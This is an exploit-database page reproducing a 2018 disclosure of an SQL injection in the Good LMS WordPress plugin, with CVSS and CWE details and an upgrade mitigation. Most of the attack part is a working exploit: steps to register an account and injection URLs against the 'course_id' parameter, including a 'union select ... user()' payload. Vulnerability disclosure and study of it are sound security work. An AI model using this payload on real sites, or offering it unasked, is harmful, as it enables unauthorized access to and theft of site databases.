header-logo
Suggest Exploit
vendor:
Good LMS - Learning Management System WP Plugin
by:
Esecurity.ir
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Good LMS - Learning Management System WP Plugin
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

Good LMS – Learning Management System WP Plugin SQL Injection

An attacker can exploit this vulnerability by entering the link below and creating an account, followed by entering a malicious SQL command in the 'course_id' parameter of the 'author' page.

Mitigation:

Upgrade to the latest version of Good LMS - Learning Management System WP Plugin
Source

Exploit-DB raw data:

# Exploit Title: Good LMS - Learning Management System WP Plugin SQL 
Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID : 
@meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version

Exploit :

	1 - First enter the link below and create an account
	http://target.com/?register=1
	2 - the exploit
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23